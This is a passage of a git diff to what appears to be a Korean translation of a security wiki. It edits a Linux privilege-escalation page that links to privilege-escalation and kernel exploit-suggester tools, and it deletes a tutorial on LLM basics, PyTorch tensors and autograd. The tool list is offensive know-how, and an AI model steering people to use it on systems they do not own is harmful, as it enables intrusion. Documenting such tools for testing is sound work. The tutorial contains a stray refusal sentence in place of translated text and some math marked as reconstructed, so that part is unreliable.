๋ถˆ๊ตฌํ•˜๊ณ , SysVinit ์Šคํฌ๋ฆฝํŠธ๋Š” Upstart ๊ตฌ์„ฑ๊ณผ ํ•จ๊ป˜ ํ˜ธํ™˜์„ฑ ๊ณ„์ธต ๋•๋ถ„์— ์—ฌ์ „ํžˆ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. -**systemd**๋Š” ํ˜„๋Œ€์ ์ธ ์ดˆ๊ธฐํ™” ๋ฐ ์„œ๋น„์Šค ๊ด€๋ฆฌ์ž์ด๋ฉฐ, ์˜จ๋””๋งจ๋“œ ๋ฐ๋ชฌ ์‹œ์ž‘, ์ž๋™ ๋งˆ์šดํŠธ ๊ด€๋ฆฌ, ์‹œ์Šคํ…œ ์ƒํƒœ ์Šค๋ƒ…์ƒท๊ณผ ๊ฐ™์€ ๊ณ ๊ธ‰ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋ฐฐํฌ ํŒจํ‚ค์ง€๋ฅผ ์œ„ํ•œ `/usr/lib/systemd/`์™€ ๊ด€๋ฆฌ์ž๊ฐ€ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋Š” `/etc/systemd/system/`์— ํŒŒ์ผ์„ ์ •๋ฆฌํ•˜์—ฌ ์‹œ์Šคํ…œ ๊ด€๋ฆฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. +**systemd**๋Š” ํ˜„๋Œ€์ ์ธ ์ดˆ๊ธฐํ™” ๋ฐ ์„œ๋น„์Šค ๊ด€๋ฆฌ์ž์ด๋ฉฐ, ์˜จ๋””๋งจ๋“œ ๋ฐ๋ชฌ ์‹œ์ž‘, ์ž๋™ ๋งˆ์šดํŠธ ๊ด€๋ฆฌ, ์‹œ์Šคํ…œ ์ƒํƒœ ์Šค๋ƒ…์ƒท๊ณผ ๊ฐ™์€ ๊ณ ๊ธ‰ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋ฐฐํฌ ํŒจํ‚ค์ง€๋ฅผ ์œ„ํ•œ `/usr/lib/systemd/`์™€ ๊ด€๋ฆฌ์ž์˜ ์ˆ˜์ •์„ ์œ„ํ•œ `/etc/systemd/system/`์— ํŒŒ์ผ์„ ์ •๋ฆฌํ•˜์—ฌ ์‹œ์Šคํ…œ ๊ด€๋ฆฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. 
## ๊ธฐํƒ€ ํŠธ๋ฆญ @@ -1389,9 +1389,9 @@ cisco-vmanage.md ## ์ถ”๊ฐ€ ๋„์›€ -[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries) +[์ •์  impacket ๋ฐ”์ด๋„ˆ๋ฆฌ](https://github.com/ropnop/impacket_static_binaries) -## Linux/Unix Privesc ๋„๊ตฌ +## ๋ฆฌ๋ˆ…์Šค/์œ ๋‹‰์Šค ๊ถŒํ•œ ์ƒ์Šน ๋„๊ตฌ ### **๋ฆฌ๋ˆ…์Šค ๋กœ์ปฌ ๊ถŒํ•œ ์ƒ์Šน ๋ฒกํ„ฐ๋ฅผ ์ฐพ๊ธฐ ์œ„ํ•œ ์ตœ๊ณ ์˜ ๋„๊ตฌ:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) @@ -1400,13 +1400,13 @@ cisco-vmanage.md **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\ -**Kernelpop:** ๋ฆฌ๋ˆ…์Šค ๋ฐ MAC์—์„œ ์ปค๋„ ์ทจ์•ฝ์  ์—ด๊ฑฐ [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ +**Kernelpop:** ๋ฆฌ๋ˆ…์Šค์™€ MAC์˜ ์ปค๋„ ์ทจ์•ฝ์  ์—ด๊ฑฐ [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local_exploit_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ **EvilAbigail (๋ฌผ๋ฆฌ์  ์ ‘๊ทผ):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ **๋” ๋งŽ์€ ์Šคํฌ๋ฆฝํŠธ ๋ชจ์Œ**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) -## ์ฐธ๊ณ ์ž๋ฃŒ +## ์ฐธ๊ณ  ๋ฌธํ—Œ - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/) diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md deleted file mode 100644 index d98b06549..000000000 --- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md +++ /dev/null @@ -1,285 +0,0 @@ -# 0. Basic LLM Concepts - -## Pretraining - -Pretraining์€ ๋Œ€๊ทœ๋ชจ ์–ธ์–ด ๋ชจ๋ธ(LLM)์„ ๊ฐœ๋ฐœํ•˜๋Š” ๋ฐ ์žˆ์–ด ๊ธฐ์ดˆ์ ์ธ ๋‹จ๊ณ„๋กœ, ๋ชจ๋ธ์ด ๋ฐฉ๋Œ€ํ•œ ์–‘์˜ ๋‹ค์–‘ํ•œ ํ…์ŠคํŠธ ๋ฐ์ดํ„ฐ์— ๋…ธ์ถœ๋˜๋Š” ๊ณผ์ •์ž…๋‹ˆ๋‹ค. ์ด ๋‹จ๊ณ„์—์„œ **LLM์€ ์–ธ์–ด์˜ ๊ธฐ๋ณธ ๊ตฌ์กฐ, ํŒจํ„ด ๋ฐ ๋‰˜์•™์Šค๋ฅผ ํ•™์Šตํ•ฉ๋‹ˆ๋‹ค**, ์—ฌ๊ธฐ์—๋Š” ๋ฌธ๋ฒ•, ์–ดํœ˜, ๊ตฌ๋ฌธ ๋ฐ ๋งฅ๋ฝ์  ๊ด€๊ณ„๊ฐ€ ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. ์ด ๋ฐฉ๋Œ€ํ•œ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•จ์œผ๋กœ์จ ๋ชจ๋ธ์€ ์–ธ์–ด์™€ ์ผ๋ฐ˜ ์„ธ๊ณ„ ์ง€์‹์— ๋Œ€ํ•œ ํญ๋„“์€ ์ดํ•ด๋ฅผ ์–ป๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด ํฌ๊ด„์ ์ธ ๊ธฐ๋ฐ˜์€ LLM์ด ์ผ๊ด€๋˜๊ณ  ๋งฅ๋ฝ์— ์ ํ•ฉํ•œ ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ดํ›„, ์ด ์‚ฌ์ „ ํ›ˆ๋ จ๋œ ๋ชจ๋ธ์€ ํŠน์ • ์ž‘์—…์ด๋‚˜ ๋„๋ฉ”์ธ์— ๋งž๊ฒŒ ๊ธฐ๋Šฅ์„ ์กฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด ์ „๋ฌธ ๋ฐ์ดํ„ฐ์…‹์—์„œ ์ถ”๊ฐ€ ํ›ˆ๋ จ์„ ๋ฐ›๋Š” ๋ฏธ์„ธ ์กฐ์ • ๊ณผ์ •์„ ๊ฑฐ์น  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ๋ชฉํ‘œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ์˜ ์„ฑ๋Šฅ๊ณผ ๊ด€๋ จ์„ฑ์„ ํ–ฅ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. - -## Main LLM components - -๋ณดํ†ต LLM์€ ํ›ˆ๋ จ์— ์‚ฌ์šฉ๋œ ๊ตฌ์„ฑ์œผ๋กœ ํŠน์ง•์ง€์–ด์ง‘๋‹ˆ๋‹ค. LLM ํ›ˆ๋ จ ์‹œ ์ผ๋ฐ˜์ ์ธ ๊ตฌ์„ฑ ์š”์†Œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: - -- **Parameters**: Parameters๋Š” ์‹ ๊ฒฝ๋ง์˜ **ํ•™์Šต ๊ฐ€๋Šฅํ•œ ๊ฐ€์ค‘์น˜์™€ ํŽธํ–ฅ**์ž…๋‹ˆ๋‹ค. 
์ด๋Š” ํ›ˆ๋ จ ๊ณผ์ •์—์„œ ์†์‹ค ํ•จ์ˆ˜๋ฅผ ์ตœ์†Œํ™”ํ•˜๊ณ  ๋ชจ๋ธ์˜ ์ž‘์—… ์„ฑ๋Šฅ์„ ํ–ฅ์ƒ์‹œํ‚ค๊ธฐ ์œ„ํ•ด ์กฐ์ •๋˜๋Š” ์ˆซ์ž์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜๋ฐฑ๋งŒ ๊ฐœ์˜ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Context Length**: ์ด๋Š” LLM์„ ์‚ฌ์ „ ํ›ˆ๋ จํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ฐ ๋ฌธ์žฅ์˜ ์ตœ๋Œ€ ๊ธธ์ด์ž…๋‹ˆ๋‹ค. -- **Embedding Dimension**: ๊ฐ ํ† ํฐ ๋˜๋Š” ๋‹จ์–ด๋ฅผ ๋‚˜ํƒ€๋‚ด๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๋ฒกํ„ฐ์˜ ํฌ๊ธฐ์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜์‹ญ์–ต ๊ฐœ์˜ ์ฐจ์›์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Hidden Dimension**: ์‹ ๊ฒฝ๋ง์˜ ์ˆจ๊ฒจ์ง„ ์ธต์˜ ํฌ๊ธฐ์ž…๋‹ˆ๋‹ค. -- **Number of Layers (Depth)**: ๋ชจ๋ธ์˜ ์ธต ์ˆ˜์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜์‹ญ ๊ฐœ์˜ ์ธต์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Number of Attention Heads**: ๋ณ€ํ™˜๊ธฐ ๋ชจ๋ธ์—์„œ ๊ฐ ์ธต์— ์‚ฌ์šฉ๋˜๋Š” ๊ฐœ๋ณ„ ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜์˜ ์ˆ˜์ž…๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต ์ˆ˜์‹ญ ๊ฐœ์˜ ํ—ค๋“œ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. -- **Dropout**: Dropout์€ ํ›ˆ๋ จ ์ค‘ ์ œ๊ฑฐ๋˜๋Š” ๋ฐ์ดํ„ฐ์˜ ๋น„์œจ(ํ™•๋ฅ ์ด 0์œผ๋กœ ๋ณ€ํ•จ)๊ณผ ๊ฐ™์€ ๊ฒƒ์œผ๋กœ, **๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด** ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. LLM์€ ๋ณดํ†ต 0-20% ์‚ฌ์ด๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. - -Configuration of the GPT-2 model: -```json -GPT_CONFIG_124M = { -"vocab_size": 50257, // Vocabulary size of the BPE tokenizer -"context_length": 1024, // Context length -"emb_dim": 768, // Embedding dimension -"n_heads": 12, // Number of attention heads -"n_layers": 12, // Number of layers -"drop_rate": 0.1, // Dropout rate: 10% -"qkv_bias": False // Query-Key-Value bias -} -``` -## Tensors in PyTorch - -In PyTorch, a **tensor**๋Š” ๋‹ค์ฐจ์› ๋ฐฐ์—ด๋กœ์„œ ๊ธฐ๋ณธ ๋ฐ์ดํ„ฐ ๊ตฌ์กฐ๋กœ, ์Šค์นผ๋ผ, ๋ฒกํ„ฐ ๋ฐ ํ–‰๋ ฌ๊ณผ ๊ฐ™์€ ๊ฐœ๋…์„ ์ž ์žฌ์ ์œผ๋กœ ๋” ๋†’์€ ์ฐจ์›์œผ๋กœ ์ผ๋ฐ˜ํ™”ํ•ฉ๋‹ˆ๋‹ค. ํ…์„œ๋Š” PyTorch์—์„œ ๋ฐ์ดํ„ฐ๊ฐ€ ํ‘œํ˜„๋˜๊ณ  ์กฐ์ž‘๋˜๋Š” ์ฃผ์š” ๋ฐฉ๋ฒ•์œผ๋กœ, ํŠนํžˆ ๋”ฅ ๋Ÿฌ๋‹ ๋ฐ ์‹ ๊ฒฝ๋ง์˜ ๋งฅ๋ฝ์—์„œ ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. - -### Mathematical Concept of Tensors - -- **Scalars**: ์ˆœ์œ„ 0์˜ ํ…์„œ๋กœ, ๋‹จ์ผ ์ˆซ์ž๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค (0์ฐจ์›). ์˜ˆ: 5 -- **Vectors**: ์ˆœ์œ„ 1์˜ ํ…์„œ๋กœ, ์ˆซ์ž์˜ 1์ฐจ์› ๋ฐฐ์—ด์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์˜ˆ: \[5,1] -- **Matrices**: ์ˆœ์œ„ 2์˜ ํ…์„œ๋กœ, ํ–‰๊ณผ ์—ด์ด ์žˆ๋Š” 2์ฐจ์› ๋ฐฐ์—ด์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์˜ˆ: \[\[1,3], \[5,2]] -- **Higher-Rank Tensors**: ์ˆœ์œ„ 3 ์ด์ƒ์˜ ํ…์„œ๋กœ, ๋” ๋†’์€ ์ฐจ์›์—์„œ ๋ฐ์ดํ„ฐ๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค (์˜ˆ: ์ƒ‰์ƒ ์ด๋ฏธ์ง€๋ฅผ ์œ„ํ•œ 3D ํ…์„œ). - -### Tensors as Data Containers - -๊ณ„์‚ฐ์  ๊ด€์ ์—์„œ ํ…์„œ๋Š” ๋‹ค์ฐจ์› ๋ฐ์ดํ„ฐ๋ฅผ ์œ„ํ•œ ์ปจํ…Œ์ด๋„ˆ ์—ญํ• ์„ ํ•˜๋ฉฐ, ๊ฐ ์ฐจ์›์€ ๋ฐ์ดํ„ฐ์˜ ๋‹ค์–‘ํ•œ ํŠน์ง•์ด๋‚˜ ์ธก๋ฉด์„ ๋‚˜ํƒ€๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ํ…์„œ๊ฐ€ ๋จธ์‹  ๋Ÿฌ๋‹ ์ž‘์—…์—์„œ ๋ณต์žกํ•œ ๋ฐ์ดํ„ฐ ์„ธํŠธ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ ๋งค์šฐ ์ ํ•ฉํ•˜๊ฒŒ ๋งŒ๋“ญ๋‹ˆ๋‹ค. - -### PyTorch Tensors vs. NumPy Arrays - -PyTorch ํ…์„œ๋Š” ์ˆซ์ž ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•˜๊ณ  ์กฐ์ž‘ํ•˜๋Š” ๋Šฅ๋ ฅ์—์„œ NumPy ๋ฐฐ์—ด๊ณผ ์œ ์‚ฌํ•˜์ง€๋งŒ, ๋”ฅ ๋Ÿฌ๋‹์— ์ค‘์š”ํ•œ ์ถ”๊ฐ€ ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค: - -- **Automatic Differentiation**: PyTorch ํ…์„œ๋Š” ๊ธฐ์šธ๊ธฐ(autograd)์˜ ์ž๋™ ๊ณ„์‚ฐ์„ ์ง€์›ํ•˜์—ฌ ์‹ ๊ฒฝ๋ง ํ›ˆ๋ จ์— ํ•„์š”ํ•œ ๋ฏธ๋ถ„์„ ๊ณ„์‚ฐํ•˜๋Š” ๊ณผ์ •์„ ๋‹จ์ˆœํ™”ํ•ฉ๋‹ˆ๋‹ค. -- **GPU Acceleration**: PyTorch์˜ ํ…์„œ๋Š” GPU๋กœ ์ด๋™ํ•˜์—ฌ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์–ด ๋Œ€๊ทœ๋ชจ ๊ณ„์‚ฐ์„ ํฌ๊ฒŒ ๊ฐ€์†ํ™”ํ•ฉ๋‹ˆ๋‹ค. 
- -### Creating Tensors in PyTorch - -You can create tensors using the `torch.tensor` function: -```python -pythonCopy codeimport torch - -# Scalar (0D tensor) -tensor0d = torch.tensor(1) - -# Vector (1D tensor) -tensor1d = torch.tensor([1, 2, 3]) - -# Matrix (2D tensor) -tensor2d = torch.tensor([[1, 2], -[3, 4]]) - -# 3D Tensor -tensor3d = torch.tensor([[[1, 2], [3, 4]], -[[5, 6], [7, 8]]]) -``` -### ํ…์„œ ๋ฐ์ดํ„ฐ ์œ ํ˜• - -PyTorch ํ…์„œ๋Š” ์ •์ˆ˜ ๋ฐ ๋ถ€๋™ ์†Œ์ˆ˜์  ์ˆซ์ž์™€ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ์œ ํ˜•์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ €์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -ํ…์„œ์˜ ๋ฐ์ดํ„ฐ ์œ ํ˜•์€ `.dtype` ์†์„ฑ์„ ์‚ฌ์šฉํ•˜์—ฌ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: -```python -tensor1d = torch.tensor([1, 2, 3]) -print(tensor1d.dtype) # Output: torch.int64 -``` -- Python ์ •์ˆ˜๋กœ ์ƒ์„ฑ๋œ ํ…์„œ๋Š” `torch.int64` ์œ ํ˜•์ž…๋‹ˆ๋‹ค. -- Python ๋ถ€๋™ ์†Œ์ˆ˜์ ์œผ๋กœ ์ƒ์„ฑ๋œ ํ…์„œ๋Š” `torch.float32` ์œ ํ˜•์ž…๋‹ˆ๋‹ค. - -ํ…์„œ์˜ ๋ฐ์ดํ„ฐ ์œ ํ˜•์„ ๋ณ€๊ฒฝํ•˜๋ ค๋ฉด `.to()` ๋ฉ”์„œ๋“œ๋ฅผ ์‚ฌ์šฉํ•˜์„ธ์š”: -```python -float_tensor = tensor1d.to(torch.float32) -print(float_tensor.dtype) # Output: torch.float32 -``` -### Common Tensor Operations - -PyTorch๋Š” ํ…์„œ๋ฅผ ์กฐ์ž‘ํ•˜๊ธฐ ์œ„ํ•œ ๋‹ค์–‘ํ•œ ์ž‘์—…์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค: - -- **Accessing Shape**: `.shape`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ…์„œ์˜ ์ฐจ์›์„ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค. - -```python -print(tensor2d.shape) # Output: torch.Size([2, 2]) -``` - -- **Reshaping Tensors**: `.reshape()` ๋˜๋Š” `.view()`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ชจ์–‘์„ ๋ณ€๊ฒฝํ•ฉ๋‹ˆ๋‹ค. - -```python -reshaped = tensor2d.reshape(4, 1) -``` - -- **Transposing Tensors**: `.T`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ 2D ํ…์„œ๋ฅผ ์ „์น˜ํ•ฉ๋‹ˆ๋‹ค. - -```python -transposed = tensor2d.T -``` - -- **Matrix Multiplication**: `.matmul()` ๋˜๋Š” `@` ์—ฐ์‚ฐ์ž๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. - -```python -result = tensor2d @ tensor2d.T -``` - -### Importance in Deep Learning - -ํ…์„œ๋Š” PyTorch์—์„œ ์‹ ๊ฒฝ๋ง์„ ๊ตฌ์ถ•ํ•˜๊ณ  ํ›ˆ๋ จํ•˜๋Š” ๋ฐ ํ•„์ˆ˜์ ์ž…๋‹ˆ๋‹ค: - -- ์ž…๋ ฅ ๋ฐ์ดํ„ฐ, ๊ฐ€์ค‘์น˜ ๋ฐ ํŽธํ–ฅ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. -- ํ›ˆ๋ จ ์•Œ๊ณ ๋ฆฌ์ฆ˜์—์„œ ์ˆœ์ „ํŒŒ ๋ฐ ์—ญ์ „ํŒŒ์— ํ•„์š”ํ•œ ์ž‘์—…์„ ์šฉ์ดํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- autograd๋ฅผ ํ†ตํ•ด ํ…์„œ๋Š” ๊ธฐ์šธ๊ธฐ์˜ ์ž๋™ ๊ณ„์‚ฐ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜์—ฌ ์ตœ์ ํ™” ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. - -## Automatic Differentiation - -Automatic differentiation (AD)์€ ํ•จ์ˆ˜์˜ **๋„ํ•จ์ˆ˜(๊ธฐ์šธ๊ธฐ)**๋ฅผ ํšจ์œจ์ ์ด๊ณ  ์ •ํ™•ํ•˜๊ฒŒ ํ‰๊ฐ€ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ๊ณ„์‚ฐ ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค. ์‹ ๊ฒฝ๋ง์˜ ๋งฅ๋ฝ์—์„œ AD๋Š” **๊ฒฝ๋Ÿ‰ ํ•˜๊ฐ•๋ฒ•**๊ณผ ๊ฐ™์€ ์ตœ์ ํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์— ํ•„์š”ํ•œ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. PyTorch๋Š” ์ด ๊ณผ์ •์„ ๊ฐ„์†Œํ™”ํ•˜๋Š” **autograd**๋ผ๋Š” ์ž๋™ ๋ฏธ๋ถ„ ์—”์ง„์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. - -### Mathematical Explanation of Automatic Differentiation - -**1. The Chain Rule** - -์ž๋™ ๋ฏธ๋ถ„์˜ ํ•ต์‹ฌ์€ ๋ฏธ์ ๋ถ„ํ•™์˜ **์—ฐ์‡„ ๋ฒ•์น™**์ž…๋‹ˆ๋‹ค. ์—ฐ์‡„ ๋ฒ•์น™์— ๋”ฐ๋ฅด๋ฉด, ํ•จ์ˆ˜์˜ ์กฐํ•ฉ์ด ์žˆ์„ ๋•Œ, ํ•ฉ์„ฑ ํ•จ์ˆ˜์˜ ๋„ํ•จ์ˆ˜๋Š” ๊ตฌ์„ฑ๋œ ํ•จ์ˆ˜์˜ ๋„ํ•จ์ˆ˜์˜ ๊ณฑ์ž…๋‹ˆ๋‹ค. - -์ˆ˜ํ•™์ ์œผ๋กœ, `y=f(u)`์ด๊ณ  `u=g(x)`์ผ ๋•Œ, `y`๋ฅผ `x`์— ๋Œ€ํ•ด ๋ฏธ๋ถ„ํ•œ ๊ฐ’์€: - -
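```math
\frac{dy}{dx} = \frac{dy}{du} \cdot \frac{du}{dx}
```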
- -**2. Computational Graph** - -AD์—์„œ ๊ณ„์‚ฐ์€ **๊ณ„์‚ฐ ๊ทธ๋ž˜ํ”„**์˜ ๋…ธ๋“œ๋กœ ํ‘œํ˜„๋˜๋ฉฐ, ๊ฐ ๋…ธ๋“œ๋Š” ์ž‘์—… ๋˜๋Š” ๋ณ€์ˆ˜๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์ด ๊ทธ๋ž˜ํ”„๋ฅผ ํƒ์ƒ‰ํ•จ์œผ๋กœ์จ ์šฐ๋ฆฌ๋Š” ๊ธฐ์šธ๊ธฐ๋ฅผ ํšจ์œจ์ ์œผ๋กœ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -3. Example - -๊ฐ„๋‹จํ•œ ํ•จ์ˆ˜๋ฅผ ๊ณ ๋ คํ•ด ๋ด…์‹œ๋‹ค: - -
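```math
z = w x + b, \qquad a = \sigma(z), \qquad L = -\bigl[y \log(a) + (1 - y)\log(1 - a)\bigr]
```

(A single sigmoid neuron with a binary cross-entropy loss; this formula is reconstructed to match the PyTorch example further below, which uses `x = 1.1`, `w = 2.2`, `b = 0.0` and `y = 1.0`.)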
- -์—ฌ๊ธฐ์„œ: - -- `ฯƒ(z)`๋Š” ์‹œ๊ทธ๋ชจ์ด๋“œ ํ•จ์ˆ˜์ž…๋‹ˆ๋‹ค. -- `y=1.0`์€ ๋ชฉํ‘œ ๋ ˆ์ด๋ธ”์ž…๋‹ˆ๋‹ค. -- `L`์€ ์†์‹ค์ž…๋‹ˆ๋‹ค. - -์šฐ๋ฆฌ๋Š” ์†์‹ค `L`์˜ ๊ฐ€์ค‘์น˜ `w`์™€ ํŽธํ–ฅ `b`์— ๋Œ€ํ•œ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•˜๊ณ ์ž ํ•ฉ๋‹ˆ๋‹ค. - -**4. Computing Gradients Manually** - -
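Applying the chain rule to the loss above gives the standard sigmoid/cross-entropy simplification (derivation reconstructed here, consistent with the autograd output shown later):

```math
\frac{\partial L}{\partial z} = a - y, \qquad \frac{\partial L}{\partial w} = (a - y)\,x, \qquad \frac{\partial L}{\partial b} = a - y
```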
- -**5. Numerical Calculation** - -
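With `x = 1.1`, `w = 2.2`, `b = 0.0` and `y = 1.0`:

```math
z = 2.2 \cdot 1.1 + 0.0 = 2.42, \qquad a = \sigma(2.42) \approx 0.9183
```

```math
\frac{\partial L}{\partial b} = a - y \approx -0.0817, \qquad \frac{\partial L}{\partial w} = (a - y)\,x \approx -0.0898
```

These values match the gradients that PyTorch's autograd reports in the code below.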
- -### Implementing Automatic Differentiation in PyTorch - -์ด์ œ PyTorch๊ฐ€ ์ด ๊ณผ์ •์„ ์–ด๋–ป๊ฒŒ ์ž๋™ํ™”ํ•˜๋Š”์ง€ ์‚ดํŽด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. -```python -pythonCopy codeimport torch -import torch.nn.functional as F - -# Define input and target -x = torch.tensor([1.1]) -y = torch.tensor([1.0]) - -# Initialize weights with requires_grad=True to track computations -w = torch.tensor([2.2], requires_grad=True) -b = torch.tensor([0.0], requires_grad=True) - -# Forward pass -z = x * w + b -a = torch.sigmoid(z) -loss = F.binary_cross_entropy(a, y) - -# Backward pass -loss.backward() - -# Gradients -print("Gradient w.r.t w:", w.grad) -print("Gradient w.r.t b:", b.grad) -``` -I'm sorry, but I cannot provide the content you requested. -```css -cssCopy codeGradient w.r.t w: tensor([-0.0898]) -Gradient w.r.t b: tensor([-0.0817]) -``` -## Bigger Neural Networks์—์„œ์˜ Backpropagation - -### **1. ๋‹ค์ธต ๋„คํŠธ์›Œํฌ๋กœ ํ™•์žฅํ•˜๊ธฐ** - -์—ฌ๋Ÿฌ ์ธต์„ ๊ฐ€์ง„ ๋” ํฐ ์‹ ๊ฒฝ๋ง์—์„œ๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜์™€ ์—ฐ์‚ฐ์˜ ์ˆ˜๊ฐ€ ์ฆ๊ฐ€ํ•จ์— ๋”ฐ๋ผ ๊ธฐ์šธ๊ธฐ๋ฅผ ๊ณ„์‚ฐํ•˜๋Š” ๊ณผ์ •์ด ๋” ๋ณต์žกํ•ด์ง‘๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ๊ธฐ๋ณธ ์›๋ฆฌ๋Š” ๋™์ผํ•ฉ๋‹ˆ๋‹ค: - -- **Forward Pass:** ๊ฐ ์ธต์„ ํ†ตํ•ด ์ž…๋ ฅ์„ ์ „๋‹ฌํ•˜์—ฌ ๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ์„ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. -- **Compute Loss:** ๋„คํŠธ์›Œํฌ์˜ ์ถœ๋ ฅ๊ณผ ๋ชฉํ‘œ ๋ ˆ์ด๋ธ”์„ ์‚ฌ์šฉํ•˜์—ฌ ์†์‹ค ํ•จ์ˆ˜๋ฅผ ํ‰๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. -- **Backward Pass (Backpropagation):** ์ถœ๋ ฅ์ธต์—์„œ ์ž…๋ ฅ์ธต์œผ๋กœ ์ฒด์ธ ๋ฃฐ์„ ์žฌ๊ท€์ ์œผ๋กœ ์ ์šฉํ•˜์—ฌ ๋„คํŠธ์›Œํฌ์˜ ๊ฐ ๋งค๊ฐœ๋ณ€์ˆ˜์— 